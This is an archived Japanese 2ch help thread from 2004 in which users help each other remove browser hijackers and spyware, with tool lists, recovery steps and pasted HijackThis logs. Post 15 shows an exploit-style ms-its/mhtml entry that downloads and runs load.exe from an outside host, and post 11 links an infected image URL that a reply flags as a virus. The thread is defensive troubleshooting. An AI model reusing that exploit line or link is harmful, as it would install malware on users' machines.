5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

エロサイト見てたら…助けてください!part24

1 :ひよこ名無しさん:04/05/17 22:23 ID:???
エロサイトに限らずWEBを見て回ってたらブラウザ乗っ取られて大変なことに…
いったいどうしたらいいの?って人のためのスレッドです。

 ■このスレのテンプレは「まとめサイト」 http://haiiro.info/my/text/template.html
  が見やすいです。(セキュリティ関係の情報サイト「スターマジック」の「はいいろ」
  さんのご好意で作成されています。感謝)

 ■まず「まとめサイト」の「応急処置」できるとこまでやってみてください。8割は解決
  するはず。な〜んにもしないで質問するとネタ回答食う可能性大w

 ■迷惑ソフトはまず「プログラム(アプリケーション)の追加と削除」から削除できない
  か確認。JWord入れたら変な中国サイトに飛ばされるって人はここでJWordを
  アンインストしないと面倒なことになります。googleで「迷惑なヤシの名 + uninstall」
  で公式アンインストーラがヒットすることもあります。最後にゴミをHijackthisで処理

 ■それでダメだったら、質問の仕方に従って質問してください。

▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
 ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
 ・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
 ・ OSの種類(必須)、ブラウザ、セキュ関係ソフトの有無、自分でしたことと結果を明記。


★流行中のSASSERウィルス関連はこちら見てください★
セキュリティ板 http://pc3.2ch.net/sec/ に逝って「sasser」で検索
・MS公式対策ページ
 ホームユーザー向け - Sasser ウイルスに関する情報 Windows 2000 編
  http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
 ホームユーザー向け - Sasser ウイルスに関する情報 Windows XP 編
  http://www.microsoft.com/japan/security/incident/sasser_xp.mspx

2 :ひよこ名無しさん:04/05/17 22:24 ID:???
過去ログ
part23 http://pc5.2ch.net/test/read.cgi/pcqa/1083768109/ 前スレ
part22 http://pc5.2ch.net/test/read.cgi/pcqa/1083241874/ 
part21 http://pc5.2ch.net/test/read.cgi/pcqa/1082454987/
part20 http://pc5.2ch.net/test/read.cgi/pcqa/1081541559/
Part19 http://pc5.2ch.net/test/read.cgi/pcqa/1079883028/
Part18 http://pc2.2ch.net/test/read.cgi/pcqa/1077184761/
Part17 http://pc2.2ch.net/test/read.cgi/pcqa/1074003703/
Part16 http://pc5.2ch.net/pcqa/kako/1070/10709/1070987138.html
Part15 http://pc5.2ch.net/pcqa/kako/1067/10676/1067657959.html
Part14 http://pc5.2ch.net/pcqa/kako/1063/10634/1063426852.html
Part13 http://pc5.2ch.net/pcqa/kako/1057/10575/1057575418.html
Part12 http://pc5.2ch.net/pcqa/kako/1052/10529/1052909722.html
Part11 http://pc5.2ch.net/pcqa/kako/1047/10473/1047359426.html
Part10 http://pc5.2ch.net/pcqa/kako/1043/10439/1043963296.html
Part9  http://pc5.2ch.net/pcqa/kako/1041/10415/1041587359.html
Part8  http://pc.2ch.net/pcqa/kako/1038/10380/1038097140.html
Part7  http://pc.2ch.net/pcqa/kako/1035/10351/1035125416.html
Part6  http://pc.2ch.net/pcqa/kako/1031/10313/1031391849.html
Part5  http://pc.2ch.net/pcqa/kako/1027/10273/1027339934.html
Part4  http://pc.2ch.net/pcqa/kako/1022/10228/1022827947.html
Part3  http://pc.2ch.net/pcqa/kako/1019/10191/1019182804.html
Part2  http://pc.2ch.net/pcqa/kako/1016/10168/1016896969.html
Part1  http://pc.2ch.net/pcqa/kako/988/988993220.html

3 :ひよこ名無しさん:04/05/17 22:24 ID:???
《応急処置》
WEB見ててブラウザが変になったらとりあえず以下を実行。ブラクラ、ジョークソフト、
ブラウザジャッカー、スパイウェアなどの迷惑ソフトの8割はこれで撃退できますよん。

1) 閉じない窓を強制的に閉じる→alt+F4
2) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
  プログラム→WEB設定のリセット(作業中頻繁に実行してください。無限ループ防止)
3)IEの履歴削除→ツール→インターネットオプション→全般→インターネット
  一時ファイル→クッキーの削除+ファイルの削除
4) 削除したいファイルがあるが「アクセスできません。使用中です」とかいわれて
  削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
5) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
  アプリケーションの追加と削除(JWordはここでアンインストのこと)→OS再起動
6) 定番駆除ツールで駆除  a)→b)→c)の順に実行してください。
 a)CoolWebShredder 他のツールで駆除しにくいブラウザジャッカーCoolWebSearch
  専用の駆除ツールです。まずこれから実行。
  http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo 
  または本家 ttp://www.spywareinfo.com/~merijn/downloads.html→OS再起動
 b) Ad-Aware http://www.lavasoftusa.com/ (更新頻度高)
 c) Spybot-S&D http://www.safer-networking.org/ (強力だが更新頻度低)
8)Me/XPの場合「システムの復元」で直近の正常な状態に復帰させる、という手もアリ。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]
 復元フォルダに悪プログラムが残ったままになるのでアンチウィールスのスキャン
 で警告が出たり、うっかり再度復元して緊急事態に逆戻りしたりwに注意。また復元
 ポイントは日付の古いほうから順に消えていきます。正常なポイントがどれだったか
 紙にメモ取るなりして管理しときましょう。

9)「助けて」状態が一段落したらWindows Updateでセキュ穴を埋めておきましょう。
  http://v4.windowsupdate.microsoft.com/ja/default.asp

4 :ひよこ名無しさん:04/05/17 22:24 ID:???
3

5 :ひよこ名無しさん:04/05/17 22:26 ID:???
    ┏━━┓
    ┗━┓┗━┓              ┏┓                    ┏┓
        ┗━━┛              ┃┃                    ┃┃
    ┏━━━━┓            ┏┛┃            ┏━━━┛┗━━┓
┏━┛┏━━┓┗┓          ┃┏┛            ┗━━┓┏━━━┛
┗━━┛    ┗┓┗┓      ┏┛┃                  ┏┛┃
              ┗┓┃      ┃┏┛                  ┃┏┛
                ┃┃    ┏┛┗━━┓            ┏┛┗━━━━┓
                ┃┃    ┃┏━━┓┃          ┏┛┏━━━━┓┗┓
              ┏┛┃  ┏┛┃    ┃┃          ┗━┛        ┗┓┃
            ┏┛┏┛  ┃┏┛    ┃┃      ┏┓                ┃┃
          ┏┛┏┛  ┏┛┃      ┃┗┓  ┏┛┃              ┏┛┃
      ┏━┛┏┛    ┃┏┛      ┗┓┗━┛┏┛      ┏━━━┛┏┛
      ┗━━┛      ┗┛          ┗━━━┛        ┗━━━━┛

6 :ひよこ名無しさん:04/05/17 22:26 ID:???
《ブラウザハイジャッカーと戦うときの必須ツール》
レジストリのスキャンと修復ツール Hijackthis
 http://higaitaisaku.web.infoseek.co.jp/HijackThis.exe 
日本語解説 http://higaitaisaku.web.infoseek.co.jp/hijackthis.html (詳しい)
入門チュートリアル http://haiiro.info/my/text/template.html#5 (簡易版)

《アンチスパイソフト》
■CWShredder CoolWebSearch専用駆除ソフト 更新:高
 ☆本家 ttp://www.spywareinfo.com/~merijn/downloads.html
■Ad-aware 6.0 Build181 非常駐・検索・削除 (有料版は常駐監視機能あり)
 ☆本家 ttp://www.lavasoftusa.com/ 更新:中 
  http://www.dream-seed.com/server/spy.html 使用法
■Spybot Search&Destroy 1.2 & 1.3β4非常駐・検索・削除・一部予防
 本家 ttp://www.safer-networking.org/ 更新:低 日本語対応済み。
 http://www.dream-seed.com/server/spybot.html 使用法
 -------------以上3大定番は必ずインストールしておきましょう---------

■SpyywareBlaster 2.6.1 非常駐・予防 ☆更新頻度:中
■SpywareGuard 2.2.0 常駐・予防 ☆更新頻度:低
■MRU-Blaster 1.5 IE履歴キャッシュ・クッキー削除。常駐可能 頻度:低
 本家 ttp://www.javacoolsoftware.com/index.html
■Ad-aware 6.0 Build181 日本語化ツール SpywareBlaster 日本語化
 SpywareGuard 日本語ヘルプ など
 http://bdc.s15.xrea.com/index.php?option=com_remository&Itemid=59&func=selectfolder&filecatid=1
■IE-SPYAD  IEの制限ゾーンに危険サイトを一括登録  頻度:高
 本家 ttp://www.staff.uiuc.edu/~ehowes/resource.htm
 更新用スクリプト ttp://briefcase.yahoo.co.jp/iespyad
 IE-SPYAD導入の手引き(日本語解説ページ)
 http://www.geocities.jp/ie_spyad_japanese_manual/index.html
 専用スレ http://pc.2ch.net/test/read.cgi/sec/1076041687/

7 :ひよこ名無しさん:04/05/17 22:30 ID:???
   ∩___∩      
   | ノ      ヽ/⌒) あばばばばばば
  /⌒) (゚)   (゚) | .|  
 / /   ( _●_)  ミ/   ∩―−、
.(  ヽ  |∪|  /    / (゚) 、_ `ヽ
 \    ヽノ /      /  ( ●  (゚) |つ
  /      /      | /(入__ノ   ミ   あばばっあびゃばびゃばば
 |       /       、 (_/    ノ  
 |  /\ \       \___ ノ゙ ─ー
 | /    )  )       \       _     
 ∪    (  \        \     \
       \_)

8 :名無しさん?:04/05/17 22:31 ID:???
《その他リンク集》
■ウィルス関係はこちら↓
【正式】ウィルス情報&質問 総合スレッド☆Part19
http://pc5.2ch.net/test/read.cgi/sec/1083586576/
■その他セキュリティ関係の質問は↓
セキュリティ初心者質問スレッドpart41
http://pc5.2ch.net/test/read.cgi/sec/1084345263/
■アダルトサイト被害対策の部屋
 http://higaitaisaku.web.infoseek.co.jp/
  ↑定番サイト。Hijackthis、その他ツールの使い方が詳しい。質問掲示板あり
■ダイヤルQ2、国際電話、罠サイト、架空請求関係のトラブルはここらで相談。
【メール・葉書】総合スレッドPartU【架空請求】
 http://that2.2ch.net/test/read.cgi/bouhan/1083110757/
 アダルトサイト対策の部屋
 http://www002.upp.so-net.ne.jp/dalk/higai24.html
  ↑「被害対策の部屋」とは別サイト。有料エロサイト関係のトラブル対策
■国際電話・ダイヤルQ2関連
 http://www.ntt-east.co.jp/q2/ NTT東日本 ダイヤルQ2サービス
 http://www.ntt-west.co.jp/q2/ NTT西日本 ダイヤルQ2サービス
  ↑ダイヤルQ2接続チェックプログラムもここからダウンロードできます。
 http://www.emurasoft.com/jp/chintcal/index.htm      No! 国際電話
 http://mitsu98.fc2web.com/bbs/index2.html         Dial Saver
 http://www.kddi.com/topics/atx/image.html         ダイヤルアップチェッカー
■バナー・ブラクラ対策
 http://homepage3.nifty.com/hayazo/myprg.html     ClosePopup
 http://www.proxomitron.org/                  Proxomitron(公式サイト)
 http://www.pluto.dti.ne.jp/~tengu/proxomitron/       Proxomitron(日本語解説)
 http://pc5.2ch.net/test/read.cgi/win/1077360806/l50  Proxomitron(Windows板・現行スレ)
 http://pc5.2ch.net/test/read.cgi/software/1060792740/l50  Proxomitron(ソフトウェア板・現行スレ)


9 :961:04/05/17 22:33 ID:???
>>1


>>前スレ964
http://pc5.2ch.net/test/read.cgi/pcqa/1065082687/146

10 :ひよこ名無しさん:04/05/17 22:33 ID:???
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Kerio Personal Firewall 4

・「システムセキュリティ」というプログラム起動を監視する機能により、
 キンタマウイルス http://www.symantec.com/region/jp/sarcj/data/w/w32.antinny.k.html
 などのアイコンを偽装したEXEファイルをクリックしても警告が出て感染を防げる
 (玄人向けで有料だがTiny5でも防げる。
  Sygate・Zone Alarmには似たような機能があるが防げない。
  Outpost・Kerio2・ノートン・バスター・マカフィー・ウイルスセキュリティに至っては類似機能もない)

・現時点では日本語化できない
・2バイト文字には対応していない
・Kerio2よりはわかりやすく、Zone AlarmのようにYES/NOだけでもいけるし
 kerio2のように詳細ルールも作れる
・SPIとIDS、トロイ対策のDLL監視機能もある(広告ブロックは有償版のみ)
・Outpostなみに軽い
http://pc2.2ch.net/test/read.cgi/win/1077780039/233

●「Firewallと森で遊ぼう」Kerio Personal Firewall 4解説サイト
http://eazyfox.homelinux.org/Firewall/Kerio/Kerio41.htm

●Kerio Personal Firewall 4のログビューア
http://www.geocities.jp/masagooooool/

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

11 :前スレの989:04/05/17 22:33 ID:Tal1czX+
1000を超えてしまったので、もう一度質問させてください。

下記URLをクリックしてしまったところ、ウィルスもしくはスパイウェアーに感染してしまったようです。

ttp://nise428.hp.infoseek.co.jp/cgi-bin/upload/img/1856.jpg


応急処置を試してみました。
3定番も一通り試して、Spybotで1つ削除できない項目が残っていました。
Hijack Thisを使用して【アダルトサイト被害対策の部屋】で問題とされているものを手動削除してみましたが、解決しません。
Antidoteを使用してみたところ、『ウィルスに感染』していると表示されました。

現在起こっている障害について。

1.IEのホームページが[http://jksearch.biz/redir.php]に書き換えられてしまう。(CWShredderには反応なし)
2.フォルダを開けない。開けてもフリーズする。

あと、これは先ほど気づいたので、ウィルス感染直後からの症状かどうか分からないのですが、
Google等で文字を入力しようとすると
「aaあaあaあa」
↑こんなふうに表示されてしまい、まともに入力できません。

以下に、Hijackthisのログを貼り付けさせていただきます。


12 :前スレの989:04/05/17 22:33 ID:Tal1czX+
Logfile of HijackThis v1.97.7
Scan saved at 21:56:28, on 04/05/17
Platform: Windows 98 SE (Win9x 4.10.2222A)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\VS7DEBUG\MDM.EXE
C:\PROGRAM FILES\NORTON ANTIVIRUS\NAVAPW32.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\WINDOWS\EONEMNG.EXE
C:\WINDOWS\SMUNPLUG.EXE
C:\WINDOWS\LOADQM.EXE
C:\WINDOWS\WINUPD.EXE
C:\WINDOWS\SYSTEM\CTFMON.EXE
C:\PROGRAM FILES\LOGICOOL\MOUSEWARE\SYSTEM\EM_EXEC.EXE
C:\PROGRAM FILES\MCLEAN\MCLEAN.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\WINDOWS\デスクトップ\HIGAITAISAKU\HIGAITAISAKU.EXE
C:\PROGRAM FILES\KATJUSHA200\KATJUSHA.EXE


13 :前スレの989:04/05/17 22:34 ID:Tal1czX+
F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O4 - HKLM\..\Run: [ScanRegistry] c:\windows\scanregw.exe /autorun
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [Norton Auto-Protect] C:\PROGRA~1\NORTON~1\NAVAPW32.EXE /LOADQUIET
O4 - HKLM\..\Run: [gnetmous] C:\GMOUSE\gnetmous.exe
O4 - HKLM\..\Run: [eoneMng] C:\WINDOWS\eonemng.exe
O4 - HKLM\..\Run: [SoundFusion] RunDll32 cwcprops.cpl,CrystalControlWnd
O4 - HKLM\..\Run: [SM Unplug] SMUnplug.exe
O4 - HKLM\..\Run: [LoadQM] loadqm.exe
O4 - HKLM\..\Run: [Logitech Utility] Logi_MwX.Exe
O4 - HKLM\..\Run: [Upgrade Service] C:\WINDOWS\winupd.exe
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [MDM7] "C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\VS7DEBUG\MDM.EXE"
O4 - HKCU\..\Run: [ctfmon.exe] ctfmon.exe
O4 - Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O4 - Startup: めもりーくりーなー.lnk = C:\Program Files\mclean\MClean.exe


14 :前スレの989:04/05/17 22:35 ID:Tal1czX+
O8 - Extra context menu item: Iriaへ全てのURLを送る - C:\PROGRAM FILES\IRIA106\iria_ie2.htm
O8 - Extra context menu item: Iriaでリンクのインポート - C:\PROGRAM FILES\IRIA106\iria_ie3.htm
O8 - Extra context menu item: Iriaで選択範囲をダウンロード - C:\PROGRAM FILES\IRIA106\iria_ie4.htm
O8 - Extra context menu item: Iriaですぐにダウンロード - C:\PROGRAM FILES\IRIA106\iria_ie5.htm
O8 - Extra context menu item: FlashGetでダウンロード - C:\PROGRAM FILES\FLASHGET\jc_link.htm
O8 - Extra context menu item: FlashGetで全てダウンロード - C:\PROGRAM FILES\FLASHGET\jc_all.htm
O8 - Extra context menu item: Iriaでダウンロード - C:\PROGRAM FILES\IRIA106\iria_ie1.htm
O8 - Extra context menu item: googleで検索 - C:\Program Files\YunaGoogle113\YunaGoogle.html
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://c:\PROGRA~1\MICROS~2\OFFICE10\EXCEL.EXE/3000
O8 - Extra context menu item: &iSearch The Web - res://C:\WINDOWS\SYSTEM\TOOLBAR.DLL/SEARCH.HTML
O9 - Extra button: ReGet (HKLM)
O9 - Extra 'Tools' menuitem: &Re&Get (HKLM)
O9 - Extra button: ICQ (HKLM)
O9 - Extra 'Tools' menuitem: ICQ (HKLM)
O9 - Extra button: Translate (HKLM)
O9 - Extra 'Tools' menuitem: Translator (HKLM)


15 :前スレの989:04/05/17 22:36 ID:Tal1czX+
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {4E330863-6A11-11D0-BFD8-006097237877} (InstallFromTheWeb ActiveX Control) - http://www.installfromtheweb.com/install/iftwclix.cab
O16 - DPF: {6D5FCFCB-FA6C-4CFB-9918-5F0A9F7365F2} (GigexCtrl ActiveX) - http://www.gigex.com/tv/igor/gigexagent.dll
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://download.macromedia.com/pub/shockwave/cabs/director/sw-intl.cab
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/ansi/iuctl.CAB?38010.1407986111
O16 - DPF: {D24CD359-0000-0000-0000-000000000000} - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} (QuickTime Object) - http://www.apple.com/qtactivex/qtplugin.cab
O16 - DPF: {41F17733-B041-4099-A042-B518BB6A408C} - http://a1408.g.akamai.net/7/1408/9955/20040109/akamai.info.apple.com/iTunes4/WW/win/J019-0123.20040109.Jzse4/iTunesSetup.exe
O16 - DPF: {C7173F75-4426-4B86-B5F4-BA500BE66FE0} (ChainCast VMR Client Proxy) - http://sports.1242.com/chaincast/ccpm_0221.cab
O16 - DPF: {33564D57-0000-0010-8000-00AA00389B71} - http://download.microsoft.com/download/F/6/E/F6E491A6-77E1-4E20-9F5F-94901338C922/wmv9VCM.CAB
O16 - DPF: {90C9629E-CD32-11D3-BBFB-00105A1F0D68} (InstallShield International Setup Player) - http://support.installshield.com/kb/files/Q105097/OCI/isetup.cab
O16 - DPF: {0000000A-0000-0010-8000-00AA00389B71} - http://download.microsoft.com/download/d/4/4/d446e8a9-3a86-4b59-bb19-f5bd11b40367/wmavax.CAB
O16 - DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml:file://c:\nosuch.mht!http://cashsearch.biz/legal/x.chm::/load.exe


16 :前スレの989:04/05/17 22:38 ID:Tal1czX+
以上です。
よろしくご支援お願いします。

17 :ひよこ名無しさん:04/05/17 22:41 ID:???
>>11
ウイルス貼るなよ、Bloodhound.Exploit.6

18 :前964:04/05/17 22:42 ID:dici51Iq
>>9
ありがとうございます。
でもまだ増えてる感じです。本当にスイマセン
unning processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\cisvc.exe
C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
C:\WINDOWS\System32\inetsrv\inetinfo.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\WINDOWS\System32\cidaemon.exe
C:\WINDOWS\System32\cidaemon.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\Aplix\PacketMan\PmLaunch.exe
C:\WINDOWS\System32\S3tray2.exe
C:\Program Files\Winamp\Winampa.exe
C:\Program Files\Common Files\CMEII\CMESys.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Common Files\GMT\GMT.exe
D:\デスクトップ改造\Deai.exe
D:\デスクトップ改造\tclock-030308\tclock.exe
C:\WINDOWS\System32\wuauclt.exe
C:\WINDOWS\reg33.exe
C:\WINDOWS\dl.exe
C:\WINDOWS\dlm.exe

19 :前964:04/05/17 22:42 ID:dici51Iq
C:\DOCUME~1\HIDE\LOCALS~1\Temp\afelix.exe
C:\WINDOWS\System32\appsys.exe
C:\WINDOWS\System32\services\wmplayer.exe
C:\WINDOWS\system.exe
C:\WINDOWS\system.exe
C:\WINDOWS\System32\conime.exe
D:\Program Files\WinHand\WinHandXP.exe
C:\DOCUME~1\HIDE\LOCALS~1\Temp\Rem6F.exe
C:\WINDOWS\System32\d2kpax.exe
C:\DOCUME~1\HIDE\LOCALS~1\Temp\msbb.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\System32\mshta.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\HIDE\デスクトップ\新しいフォルダ (2)\HijackThis.exe
C:\WINDOWS\System32\mshta.exe
D:\kachu\katjusha\Katjusha.exe
F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {4BCF322B-9621-4e90-9678-F1424EB7584E} - C:\WINDOWS\udpmod.dll
O2 - BHO: (no name) - {5321E378-FFAD-4999-8C62-03CA8155F0B3} - (no file)
O2 - BHO: (no name) - {9C691A33-7DDA-4C2F-BE4C-C176083F35CF} - C:\WINDOWS\Downloaded Program Files\bridge.dll
O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [IMJPMIG8.1] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [PacketMan] C:\Program Files\Aplix\PacketMan\PmLaunch.exe
O4 - HKLM\..\Run: [imjpmig] C:\Program Files\Common Files\Microsoft Shared\IME\IMJP\imjpmig.exe /RemAdvDef /AIMEREG /Migration /SetPreload

20 :前スレの989:04/05/17 22:43 ID:Tal1czX+
>>17
すいません。
ただ情報が必要かと思ったもので・・・。
本当にごめんなさい。

21 :前964:04/05/17 22:43 ID:dici51Iq
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb05.exe
O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\Winampa.exe"
O4 - HKLM\..\Run: [Services Process] C:\WINDOWS\system32\config\services.exe
O4 - HKLM\..\Run: [Sixth Beep] C:\PROGRA~1\Roam Eq Defy\bin noun.exe
O4 - HKLM\..\Run: [RunDLL] rundll32.exe "C:\WINDOWS\Downloaded Program Files\bridge.dll",Load
O4 - HKLM\..\Run: [msbb] c:\docume~1\hide\locals~1\temp\msbb.exe
O4 - HKLM\..\Run: [mdmfyx] C:\WINDOWS\mdmfyx.exe
O4 - HKLM\..\Run: [xpsystem] C:\WINDOWS\System32\services\wmplayer.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [xpsystem] C:\WINDOWS\System32\services\wmplayer.exe
O4 - Startup: 20030628.txt
O4 - Startup: 20030629.txt
O4 - Startup: 20030630.txt
O4 - Startup: 20040213.txt
O4 - Startup: 20040327.txt
O4 - Startup: 20040422.txt
O4 - Startup: connected.txt
O4 - Startup: NTUSER.DAT
O4 - Startup: ntuser.dat.LOG
O4 - Startup: ntuser.ini
O4 - Startup: デスクトップ.html
O8 - Extra context menu item: Ascii Art Editorで編集(&A) - C:\Documents and Settings\HIDE\
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: ちょこっと httpオープン - C:\Documents and Settings\HIDE\

22 :前964:04/05/17 22:49 ID:dici51Iq
O8 - Extra context menu item: ギコペに追加(&G) - C:\Documents and Settings\HIDE\
O8 - Extra context menu item: ギコペのお気に入りに追加(&F) - C:\Documents and Settings\HIDE\
O8 - Extra context menu item: ブラクラチェッカー(&B) - C:\Documents and Settings\HIDE\
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Windows Messenger (HKLM)


23 :前すれ988:04/05/17 22:50 ID:fHh0bacR
前スレ988です。IEを立ち上げると変なページになる修復→変になる→修復の繰り返し。
テンプレ>>3実行
被害対策.exe、windowsをアップデートしますた。
993 名前:ひよこ名無しさん :04/05/17 22:19 ID:???
>>988
hostsファイルは見た?
127.0.0.1localhost以外のlocalhostが出来てれば削除して上書き
Hostsファイルってこれですか?
# Copyright (c) 1998 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP stack for Windows98
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
これは大丈夫でしょうか?


24 :961:04/05/17 22:52 ID:???
>>前964
増えてんじゃん最悪な状態だな。新スレが立つのを待つ間にエロ巡りしたわけじゃないよね?

とにかくネットから切断しないと悪くなる一方だわ
WindowsUpdateが最新まで出来ていないようだから、
友人にCD-Rに焼いてもらうなりして全てインストールすること。
それからアンチウイルスソフトを買ってきて大至急インストール
inとoutを監視出来るようなPFWも持っていた方が良い。
それが終わるまでネットに繋がない方が吉

>>23
それならOK

25 :前964:04/05/17 22:57 ID:dici51Iq
>>24
まさか。
怖くてIE開けません。

26 :ひよこ名無しさん:04/05/17 22:57 ID:v4fln2gv
マスクのかかってる画像があるんですが、
これはどうやったら外すことが出来るんでしょうか?

27 :ひよこ名無しさん:04/05/17 23:02 ID:YyJmb4KP
以前IEでドイツ語圏のサイトを見回っていた後から

IEが勝手に立ち上がりドイツ圏のサイトにつながる症状になっています
(特にエロは無くアットランダムにいろんなドイツ圏の
サイトにつながる)
spybotかけると

CnsMinという項目がひっかかります
メモリー上にあるので再起動後spybotを起動させれば解決できます
とでるのですが、それの繰り返しで消せません
システムの復元でもダメでした

リカバリーしかありませんか?


28 :961:04/05/17 23:02 ID:???
>>前964
Katjusha.exe=IEだよ
かちゅでもIEの脆弱性をつくものはアウト

29 :981:04/05/17 23:05 ID:???
>>24
システム復元してみる?
その後は怪しいプログラムやアイコンはさわらないで。
そしてHijackThisする。

どう思われます?961さん

30 :981:04/05/17 23:07 ID:???
>>29 アンカーミス、正>>25

31 :961:04/05/17 23:10 ID:???
>>981
>>25=前964はログの頭切ったままだからOS内緒なんだよ。
XPか2000だと思うからXPならありかも・・・

32 :981:04/05/17 23:21 ID:???
>>25  Xpのシステム復元
スタート
すべてのプログラム
アクセサリ
システムツール
システムの復元
コンピューターを以前の状態に復元するをチェックし次へ
太字になっている感染前の日付をクリックし次へ
でシャットダウンして復元してくれる。

Meにも復元は有るはずだけど自分はXpだからよくわからん。


33 :981:04/05/17 23:24 ID:???
>>25寝た?じゃ電源切って明日に備えるか。自分も寝る。

34 :前すれ988:04/05/17 23:30 ID:fHh0bacR
前スレ961さん
直ったみたいです。ありがとうございます。

35 :ひよこ名無しさん:04/05/17 23:31 ID:???
>>1

>>33さんも乙です

36 :961:04/05/17 23:33 ID:???
俺も寝るわ

37 :ひよこ名無しさん:04/05/17 23:42 ID:???
前964 のOSはXPだろ、WEB設定のリセットしないから

無限ループしてんじゃないの。

38 :ひよこ名無しさん:04/05/18 00:53 ID:/xpcbtKe
再起動すると変なサイトにポームページが変わるんですが
どうしたら治せますか?教えて下さい

39 :ひよこ名無しさん:04/05/18 00:56 ID:???
>>38
とりあえず>>1から順に読んでいってから質問


40 :ひよこ名無しさん:04/05/18 01:10 ID:IjaXgARi
騙しサイトでブラウザに変なサーチが付くように設定され困っていました
けれど>>1のまとめサイトにより「システムの復元」により感染前のデータに戻すことができました
こんなあっさりしてしまうとなんだか逆に不安ですが、大丈夫ですよね…?
(うっかり復元したのを復元したり、スキャンがどうこうしないようにとか書いてあったので…)

ここのスレの皆様には感謝します、ありがとうございました。

41 :ひよこ名無しさん:04/05/18 01:11 ID:???
>>40
